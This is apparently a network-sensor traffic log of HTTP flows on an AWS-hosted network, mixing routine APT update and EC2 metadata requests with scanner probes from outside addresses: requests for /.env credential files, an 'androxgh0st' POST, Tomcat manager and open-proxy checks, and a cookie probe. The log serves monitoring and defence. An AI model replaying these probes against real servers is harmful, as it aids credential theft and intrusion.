main/dep11/Components-s390x.yml.gz\n 047b1b918668bbeb3be01636bca7d3bd 286152 main/dep11/Components-s390x.yml.xz\n 848b9bc6efdd3ac9c4b142acaaa70652 404992 main/dep11/icons-128x128.tar\n 08d0ae06b6d33df9f1e518c630212050 366484 main/dep11/icons-128x128.tar.gz\n 0f343b0931126a20f133d67c2b018a3b 1024 main/dep11/icons-128x128@2.tar\n 31f6566d35ccd604be46ed5b1f813cdf 29 main/dep11/icons-128x128@2.tar.gz\n c0a6290a505793b0ed98d82fd390b2cf 113664 main/dep11/icons-48x48.tar\n baae0b2d77e59b8c40a45b9f38bd0b04 82955 main/dep11/icons-48x48.tar.gz\n 0f343b0931126a20f133d67c2b018a3b 1024 main/dep11/icons-48x48@2.tar\n 31f6566d35ccd604be46ed5b1f813cdf 29 main/dep11/icons-48x48@2.tar.gz\n 1665f08e21fea2621576ada4085a0257 187392 main/dep11/icons-64x64.tar\n 1106dc5d135f631fe423e5971fe7c846 153847 main/dep11/icons-64x64.tar.gz\n 0f343b0931126a20f133d67c2b018a3b 1024 main/dep11/icons-64x64@2.tar\n 31f6566d35ccd604be46ed5b1f813cdf 29 main/dep11/icons-64x64@2.tar.gz\n cef200dfc6eb76b45a571e1c9f8c507b 210 main/i18n/Index\n a8d4aeadcb8088c17b0ec57b3f070e09 10134375 main/i18n/Translation-en\n a38838a3c976f8124e4b7d1619133f4c 677994 main/i18n/Translation-en.gz\n 9575116e7ff8f31ea8d2d15a2968bec0 471704 main/i18n/Translation-en.xz\n 47eb01aebfce99f086444ef3d5925012 105 main/source/Release\n 278e1d0b683d654fd40cdbe643854320 2477608 main/source/Sources\n 5e4d5de8ae9dc5c0485f8d70f1be902d 655540 main/source/Sources.gz\n ce7f67ad9bfcc6ff23439464392ddef6 522816 main/source/Sources.xz\n 2efb9b82a16a443bdd5ce31a7cbc05ea 126281 multiverse/binary-amd64/Packages\n bb6386f401be87e8ea15ed9c07baf2b4 29838 multiverse/binary-amd64/Packages.gz\n abef7aa3b917249261597556aae2dd14 24848 multiverse/binary-amd64/Packages.xz\n b0518bc4e09208cd96764e1efbf9579f 110 multiverse/binary-amd64/Release\n 411237bd7dc8e329339c5365bf65a5a2 17877 multiverse/binary-arm64/Packages\n d7740e440bff5c1dd423507dfea7c74c 5351 multiverse/binary-arm64/Packages.gz\n 2245c4709e2db220b96b8b9812adb46b 4944 multiverse/binary-arm64/Packages.xz\n 46574c5074908f6e597af7a245e3ec42 110 multiverse/binary-arm64/Release\n e72d3050ed457ae2544732fc0bcf7204 23916 multiverse/binary-armhf/Packages\n e3c1423b11f350549f0e31fa149e48bd 6833 multiverse/binary-armhf/Packages.gz\n 4bcfedf70be4cd106a734dc2af4b0aaa 6196 multiverse/binary-armhf/Packages.xz\n 9b35b731531dddda884600943aa26359 110 multiverse/binary-armhf/Release\n 9d8cce7bbcb363332ddf9242d907daf4 47463 multiverse/binary-i386/Packages\n 705f73b069a267cd33a7804879f1f701 12669 multiverse/binary-i386/Packages.gz\n 28793f117d03518a1045a84471733d62 11204 multiverse/binary-i386/Packages.xz\n 00e8923f8a0243085c923d04e44a69ab 109 multiverse/binary-i386/Release\n 45b11f57ce354891dcc7424a924b69a0 17032 multiverse/binary-ppc64el/Packages\n 7fa3782f643064b6f5a4e16b6e814631 5040 multiverse/binary-ppc64el/Packages.gz\n fec69807e5eca66b966538a32ae66779 4668 multiverse/binary-ppc64el/Packages.xz\n d5b337f8a511d461b744af4e3c77af69 112 multiverse/binary-ppc64el/Release\n 2267a3d3d121fe1351a8c364e1e64f9a 17021 multiverse/binary-s390x/Packages\n 107c80c9513cbab215809bf9f0a1f2a1 5046 multiverse/binary-s390x/Packages.gz\n 9fda0710019d496d665722c68b30a236 4668 multiverse/binary-s390x/Packages.xz\n ","dest_headers":"HTTP/1.1 200 OK\r\nDate: Wed, 06 Apr 2022 08:42:13 GMT\r\nServer: Apache/2.4.18 (Ubuntu)\r\nLast-Modified: Wed, 06 Apr 2022 07:12:00 GMT\r\nETag: \"15a92-5dbf713d9d000\"\r\nAccept-Ranges: bytes\r\nContent-Length: 88722\r\nCache-Control: max-age=0, proxy-revalidate\r\nExpires: Wed, 06 Apr 2022 08:42:13 GMT\r\n\r\n","dest_ip":"34.212.136.213","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":88722,"flow_id":"d728ace9-5f27-4d1f-9869-fb6e815d3ddf","http_comment":"HTTP/1.1 200 OK","http_content_length":88722,"http_method":"GET","http_user_agent":"Debian APT-HTTP/1.3 (1.6.14)","protocol_stack":"ip:tcp:http","request":"GET /ubuntu/dists/bionic-updates/InRelease HTTP/1.1","server":"Apache/2.4.18 (Ubuntu)","site":"us-west-2.ec2.archive.ubuntu.com","src_headers":"GET /ubuntu/dists/bionic-updates/InRelease HTTP/1.1\r\nHost: us-west-2.ec2.archive.ubuntu.com\r\nCache-Control: max-age=0\r\nAccept: text/*\r\nIf-Modified-Since: Tue, 05 Apr 2022 15:09:00 GMT\r\nUser-Agent: Debian APT-HTTP/1.3 (1.6.14)\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":46490,"status":200,"time_taken":3782,"transport":"tcp","uri":"/ubuntu/dists/bionic-updates/InRelease","uri_path":"/ubuntu/dists/bionic-updates/InRelease"} {"endtime":"2022-04-06T08:42:13.269048Z","timestamp":"2022-04-06T08:42:13.267700Z","bytes":432,"bytes_in":221,"bytes_out":211,"dest_headers":"HTTP/1.1 304 Not Modified\r\nDate: Wed, 06 Apr 2022 08:42:13 GMT\r\nServer: Apache/2.4.18 (Ubuntu)\r\nETag: \"3b180-56ac8e31ec000\"\r\nExpires: Wed, 06 Apr 2022 08:42:13 GMT\r\nCache-Control: max-age=0, proxy-revalidate\r\n\r\n","dest_ip":"34.212.136.213","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"flow_id":"d728ace9-5f27-4d1f-9869-fb6e815d3ddf","http_comment":"HTTP/1.1 304 Not Modified","http_method":"GET","http_user_agent":"Debian APT-HTTP/1.3 (1.6.14)","protocol_stack":"ip:tcp:http","request":"GET /ubuntu/dists/bionic/InRelease HTTP/1.1","server":"Apache/2.4.18 (Ubuntu)","site":"us-west-2.ec2.archive.ubuntu.com","src_headers":"GET /ubuntu/dists/bionic/InRelease HTTP/1.1\r\nHost: us-west-2.ec2.archive.ubuntu.com\r\nCache-Control: max-age=0\r\nAccept: text/*\r\nIf-Modified-Since: Thu, 26 Apr 2018 23:38:40 GMT\r\nUser-Agent: Debian APT-HTTP/1.3 (1.6.14)\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":46490,"status":304,"time_taken":1369,"transport":"tcp","uri":"/ubuntu/dists/bionic/InRelease","uri_path":"/ubuntu/dists/bionic/InRelease"} {"endtime":"2022-04-06T08:29:52.979702Z","timestamp":"2022-04-06T08:29:52.979702Z","bytes":231,"bytes_in":231,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"52681699-86e6-4f08-9905-ca853206b9c2","http_method":"GET","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36","protocol_stack":"ip:tcp:http","request":"GET /.env HTTP/1.1","site":"35.84.123.246","src_headers":"GET /.env HTTP/1.1\r\nHost: 35.84.123.246\r\nUser-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n","src_ip":"185.254.196.115","src_mac":"02:A5:92:DA:49:85","src_port":44542,"time_taken":170219,"transport":"tcp","uri":"/.env","uri_path":"/.env"} {"endtime":"2022-04-06T08:29:49.897005Z","timestamp":"2022-04-06T08:29:49.895161Z","bytes":1450,"bytes_in":218,"bytes_out":1232,"dest_content":"HTTP Status 404 – Not Found

HTTP Status 404 – Not Found


Type Status Report

Message /test6956.php

Description The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.


Apache Tomcat/9.0.16 (Ubuntu)

","dest_headers":"HTTP/1.1 404 \r\nContent-Type: text/html;charset=utf-8\r\nContent-Language: en\r\nContent-Length: 1095\r\nDate: Wed, 06 Apr 2022 08:29:49 GMT\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":1095,"flow_id":"3b43bbe3-4a61-4dec-ac53-b3d6a4ca5765","http_comment":"HTTP/1.1 404 ","http_content_length":1095,"http_content_type":"text/html;charset=utf-8","http_method":"GET","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET http://dyn.epicgifs.net/test6956.php HTTP/1.1","site":"dyn.epicgifs.net","src_headers":"GET http://dyn.epicgifs.net/test6956.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\r\nHost: dyn.epicgifs.net\r\nAccept: */*\r\n\r\n","src_ip":"66.115.182.73","src_mac":"02:A5:92:DA:49:85","src_port":36854,"status":404,"time_taken":91345,"transport":"tcp","uri":"/test6956.php","uri_path":"/test6956.php"} {"endtime":"2022-04-06T08:22:22.173807Z","timestamp":"2022-04-06T08:22:22.173807Z","bytes":273,"bytes_in":273,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"759f4a3b-aabb-43d8-a3a8-c23921df2905","form_data":"info=9646","http_method":"GET","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36","protocol_stack":"ip:tcp:http:google_gen","request":"GET /f5F01DP05Te/Cvg37dv4ny76.php?info=9646 HTTP/1.1","site":"google.com","src_headers":"GET /f5F01DP05Te/Cvg37dv4ny76.php?info=9646 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: close\r\nHost: google.com\r\n\r\n","src_ip":"202.95.1.13","src_mac":"02:A5:92:DA:49:85","src_port":44180,"time_taken":180254,"transport":"tcp","uri":"/f5F01DP05Te/Cvg37dv4ny76.php?info=9646","uri_path":"/f5F01DP05Te/Cvg37dv4ny76.php","uri_query":"info=9646"} {"endtime":"2022-04-06T08:21:55.804252Z","timestamp":"2022-04-06T08:21:55.804252Z","bytes":105,"bytes_in":105,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"7447f131-366c-4f95-99e5-241687a1e808","http_method":"GET","http_user_agent":"Go-http-client/1.1","protocol_stack":"ip:tcp:http","request":"GET /sitemap.xml HTTP/1.1","site":"35.84.123.246","src_headers":"GET /sitemap.xml HTTP/1.1\r\nHost: 35.84.123.246\r\nUser-Agent: Go-http-client/1.1\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"202.95.1.13","src_mac":"02:A5:92:DA:49:85","src_port":34222,"time_taken":206120,"transport":"tcp","uri":"/sitemap.xml","uri_path":"/sitemap.xml"} {"endtime":"2022-04-06T08:21:35.299556Z","timestamp":"2022-04-06T08:21:35.299556Z","bytes":104,"bytes_in":104,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"33b81780-c890-4e6b-ae39-c049704c4202","http_method":"GET","http_user_agent":"Go-http-client/1.1","protocol_stack":"ip:tcp:http","request":"GET /robots.txt HTTP/1.1","site":"35.84.123.246","src_headers":"GET /robots.txt HTTP/1.1\r\nHost: 35.84.123.246\r\nUser-Agent: Go-http-client/1.1\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"202.95.1.13","src_mac":"02:A5:92:DA:49:85","src_port":55088,"time_taken":191398,"transport":"tcp","uri":"/robots.txt","uri_path":"/robots.txt"} {"endtime":"2022-04-06T08:21:15.705272Z","timestamp":"2022-04-06T08:21:15.705272Z","bytes":105,"bytes_in":105,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"d66ef28a-8885-4a18-a4d9-2a8ed08a2b6b","http_method":"GET","http_user_agent":"Go-http-client/1.1","protocol_stack":"ip:tcp:http","request":"GET /favicon.ico HTTP/1.1","site":"35.84.123.246","src_headers":"GET /favicon.ico HTTP/1.1\r\nHost: 35.84.123.246\r\nUser-Agent: Go-http-client/1.1\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"202.95.1.13","src_mac":"02:A5:92:DA:49:85","src_port":47764,"time_taken":185012,"transport":"tcp","uri":"/favicon.ico","uri_path":"/favicon.ico"} {"endtime":"2022-04-06T08:20:37.252687Z","timestamp":"2022-04-06T08:20:37.252687Z","bytes":61,"bytes_in":61,"bytes_out":0,"cookie":"rememberMe=1","dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"6acc4cff-9ed2-479b-aa25-6910ce391c97","http_method":"GET","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","site":"35.84.123.246","src_headers":"GET / HTTP/1.1\r\nHost: 35.84.123.246\r\nCookie: rememberMe=1\r\n\r\n","src_ip":"202.95.1.13","src_mac":"02:A5:92:DA:49:85","src_port":60948,"time_taken":190189,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T08:18:08.252088Z","timestamp":"2022-04-06T08:18:08.252088Z","bytes":317,"bytes_in":317,"bytes_out":0,"cs_content_length":20,"cs_content_type":"application/x-www-form-urlencoded","dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"file_size":20,"flow_id":"549a444c-e260-4b4d-ac0f-c352f5504ae1","form_data":"0x[]=androxgh0st","http_method":"POST","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36","mime_type":"application/x-www-form-urlencoded","protocol_stack":"ip:tcp:http","request":"POST / HTTP/1.1","site":"35.84.123.246","src_content":"0x%5B%5D=androxgh0st","src_headers":"POST / HTTP/1.1\r\nHost: 35.84.123.246\r\nContent-Length: 20\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n","src_ip":"135.125.246.110","src_mac":"02:A5:92:DA:49:85","src_port":50256,"time_taken":163266,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T08:15:06.526001Z","timestamp":"2022-04-06T08:15:06.526001Z","bytes":39,"bytes_in":39,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"1f452bb4-c05d-4978-9019-9219cea52504","http_method":"GET","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","site":"35.84.123.246","src_headers":"GET / HTTP/1.1\r\nHost: 35.84.123.246\r\n\r\n","src_ip":"65.49.20.67","src_mac":"02:A5:92:DA:49:85","src_port":46064,"time_taken":19407,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T08:14:59.919149Z","timestamp":"2022-04-06T08:14:59.919149Z","bytes":184,"bytes_in":184,"bytes_out":0,"cs_content_length":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"2c156377-34a5-475f-92c0-7ee986c0b620","http_method":"GET","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","site":"35.84.123.246:80","src_headers":"GET / HTTP/1.1\r\nHost: 35.84.123.246:80\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36\r\nContent-Length: 0\r\n\r\n","src_ip":"43.229.93.146","src_mac":"02:A5:92:DA:49:85","src_port":42555,"time_taken":309633,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T08:14:26.192941Z","timestamp":"2022-04-06T08:14:26.191571Z","bytes":1430,"bytes_in":175,"bytes_out":1255,"dest_content":"HTTP Status 404 – Not Found

HTTP Status 404 – Not Found


Type Status Report

Message /manager/html

Description The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.


Apache Tomcat/9.0.16 (Ubuntu)

","dest_headers":"HTTP/1.1 404 \r\nContent-Type: text/html;charset=utf-8\r\nContent-Language: en\r\nContent-Length: 1099\r\nDate: Wed, 06 Apr 2022 08:14:26 GMT\r\nConnection: close\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":1099,"flow_id":"0907ca17-bd85-466c-b472-9dd023703bd4","http_comment":"HTTP/1.1 404 ","http_content_length":1099,"http_content_type":"text/html;charset=utf-8","http_method":"GET","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /manager/html HTTP/1.1","src_headers":"GET /manager/html HTTP/1.1\r\nConnection: close\r\nUser_Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36\r\n\r\n","src_ip":"188.166.125.81","src_mac":"02:A5:92:DA:49:85","src_port":42694,"status":404,"time_taken":163871,"transport":"tcp","uri":"/manager/html","uri_path":"/manager/html"} {"endtime":"2022-04-06T08:13:38.393140Z","timestamp":"2022-04-06T08:13:38.390744Z","bytes":1414,"bytes_in":169,"bytes_out":1245,"dest_content":"HTTP Status 404 – Not Found

HTTP Status 404 – Not Found


Type Status Report

Message /script

Description The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.


Apache Tomcat/9.0.16 (Ubuntu)

","dest_headers":"HTTP/1.1 404 \r\nContent-Type: text/html;charset=utf-8\r\nContent-Language: en\r\nContent-Length: 1089\r\nDate: Wed, 06 Apr 2022 08:13:38 GMT\r\nConnection: close\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":1089,"flow_id":"1142f473-ec24-49a2-ab9b-ae4c5e6225de","http_comment":"HTTP/1.1 404 ","http_content_length":1089,"http_content_type":"text/html;charset=utf-8","http_method":"GET","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /script HTTP/1.1","src_headers":"GET /script HTTP/1.1\r\nConnection: close\r\nUser_Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36\r\n\r\n","src_ip":"209.141.40.224","src_mac":"02:A5:92:DA:49:85","src_port":55962,"status":404,"time_taken":40839,"transport":"tcp","uri":"/script","uri_path":"/script"} {"endtime":"2022-04-06T08:11:42.453389Z","timestamp":"2022-04-06T08:11:42.452932Z","bytes":772,"bytes_in":246,"bytes_out":526,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 7200\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 08:11:42 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"bd95ea69-f853-40e5-9de5-ed470c9f9370","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAB12_4PBJX-o-ftn-_f9xIVD_faETOwzsl8VDycCsRSP6rxrdw==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":38634,"status":404,"time_taken":466,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T08:11:42.452363Z","timestamp":"2022-04-06T08:11:42.451917Z","bytes":496,"bytes_in":236,"bytes_out":260,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 7200\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 07:23:06 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 08:11:42 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"b5373456-5674-4bb3-ba57-4c17c2e21149","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAB12_4PLkzzLMnWW7D_TYFoPfLWUWPa1EHDLmlPWnb2nn366jA==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":38632,"status":200,"time_taken":464,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T08:02:06.084561Z","timestamp":"2022-04-06T08:02:06.084363Z","bytes":772,"bytes_in":246,"bytes_out":526,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 3600\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 08:02:06 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"e1027bca-0cef-42cc-92ed-77b9430de189","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAKgN4ZhrrQ8W5dCXyKL9CaTPJUz7Gz0ab15Cxxjp9XhejBZXBQ==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.12","src_mac":"02:3E:49:33:B8:B5","src_port":35210,"status":404,"time_taken":209,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T08:02:06.083850Z","timestamp":"2022-04-06T08:02:06.083556Z","bytes":496,"bytes_in":236,"bytes_out":260,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 3600\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 07:57:14 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 08:02:06 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"15f4cf3d-7184-4435-9bb8-be79a89ccfc7","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAKgN4ZgoDIVBfMqbdCFJhTJHdyR-Sy3U3VUTV3n4MesvAPsm3Q==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.12","src_mac":"02:3E:49:33:B8:B5","src_port":35208,"status":200,"time_taken":317,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T08:01:59.874177Z","timestamp":"2022-04-06T08:01:59.873967Z","bytes":772,"bytes_in":246,"bytes_out":526,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 3600\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 08:01:59 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"5e3947b0-509e-403e-a1df-a80864fc56ef","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAJiiicNb_rLsJH_e_wM2WDqJ6Kb_uTmcoC48PP6o6p7tyUHP9g==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.20","src_mac":"02:9E:53:65:4C:5F","src_port":44374,"status":404,"time_taken":232,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T08:01:59.873478Z","timestamp":"2022-04-06T08:01:59.873210Z","bytes":496,"bytes_in":236,"bytes_out":260,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 3600\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 07:30:47 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 08:01:59 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"2f0f160f-2b1e-4f77-bdc7-8d57d439b7c6","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAJiiicOYLK24xTS3vdnCjFNF_QWAxJ9U3Vj2pnP7D-_zNg5jXQ==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.20","src_mac":"02:9E:53:65:4C:5F","src_port":44372,"status":200,"time_taken":316,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T08:01:54.251923Z","timestamp":"2022-04-06T08:01:54.250617Z","bytes":1491,"bytes_in":242,"bytes_out":1249,"dest_content":"HTTP Status 404 – Not Found

HTTP Status 404 – Not Found


Type Status Report

Message /robots.txt

Description The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.


Apache Tomcat/9.0.16 (Ubuntu)

